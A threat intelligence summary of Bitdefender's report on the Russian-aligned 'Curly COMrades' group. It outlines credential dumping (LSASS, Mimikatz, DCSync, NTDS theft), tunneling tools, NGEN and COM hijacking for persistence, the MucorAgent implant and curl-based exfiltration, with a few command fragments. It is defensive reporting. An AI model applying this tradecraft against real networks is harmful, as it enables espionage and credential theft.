New Threat Actor ‘Curly COMrades’ Uses NGEN Hijacking and Multi-Layer Tunnels for Persistence

Activity from a Russian-aligned threat actor, “Curly COMrades,” has been designated by Bitdefender as a newly observed group due to insufficient attribution links to known actors and “their operational methodologies and a broader industry concern.” Activity has been traced back to mid-2024, with operations assessed to align with Russian geopolitical interests. The group has targeted governmental organizations in Georgia and an energy sector entity in Moldova. “The group's primary objective is to maintain long-term access to target networks and steal valid credentials,” reports Bitdefender, enabling both espionage and sustained operational control within victim environments. Campaign activity points to deliberate, multi-layered intrusion methods, with an emphasis on persistence, credential harvesting, and blending into legitimate network traffic with proxy and tunneling tools.

Operational activity shows a consistent focus on credential acquisition through LSASS memory dumping, Mimikatz, DCSync, “comsvcs.dll” abuse, procdump, and shadow copy retrieval of the NTDS database. Curly COMrades deploy multiple tunneling tools including Resocks, SSH, and Stunnel to maintain redundant access paths, often executing remote commands with Atexec from the Impacket toolkit. Persistence is reinforced through NGEN task hijacking. Bitdefender notes, “This task appears inactive, yet the operating system occasionally enables and executes it at unpredictable intervals (such as during system idle times or new application deployments), making it a great mechanism for restoring access covertly.” Data exfiltration is “heavily” dependent on “curl.exe,” with compromised websites leveraged as relays to mask traffic and complicate detection. These combined methods enable resilient command-and-control and covert data theft.

Technical analysis of late-2024 intrusions identified stealthy evasion efforts, including relocating “ssh.exe” to unusual paths such as “C:\ProgramData\Microsoft\UEV\Templates\Template.exe” and altering file permissions via “icacls” to support SSH traffic forwarding. Batch scripts were deployed to automate configuration changes, and netcat-like functionality was incorporated to relay communications. The group created new Windows services such as “sc create RemUtSvc” and modified registry keys with “reg import” and “reg add” commands to cement persistence. Discovery was extensive, employing native Windows binaries (“netstat,” “tasklist,” “systeminfo,” “arp,” “route,” “wmic,” “ipconfig”) alongside PowerShell Active Directory cmdlets (“Get-ADTrust,” “get-addomain,” “get-aduser”). This living-off-the-land approach reduces reliance on detectable third-party tools while enabling thorough reconnaissance of compromised environments.

The MucorAgent malware represents one of the group’s more advanced capabilities, leveraging COM hijacking to exploit NGEN tasks for stealthy persistence. This modular “.NET” tool executes AES-encrypted PowerShell payloads without spawning “powershell.exe,” avoiding common detection mechanisms. Payloads are disguised as PNG files, with results exfiltrated via “curl.exe” to attacker-controlled infrastructure. Deployment involves registry modifications to redirect CLSIDs to malicious assemblies, supported by scheduled tasks for execution. The staged architecture enables AMSI bypass, payload decryption, and secure data transfer, aligning with the group’s broader operational goals of long-term covert access and controlled data extraction.

Exfiltration methods observed are deliberately low-frequency and manual to minimize operational noise. Data staging occurs in “C:\Users\Public\Documents,” where archives created with WinRAR are uploaded through “curl.exe” to compromised intermediary servers. These staging directories are also used in conjunction with NTDS database theft and credential collection, showing the attackers’ integration of exfiltration with credential harvesting workflows. Bitdefender’s reporting indicates that Curly COMrades’ operations combine publicly available tools, open-source projects, and custom implants to maintain persistence and stealth. Their adaptable tradecraft, layered access mechanisms, and disciplined operational tempo make them a high-severity threat capable of sustained and covert activity against strategically important targets.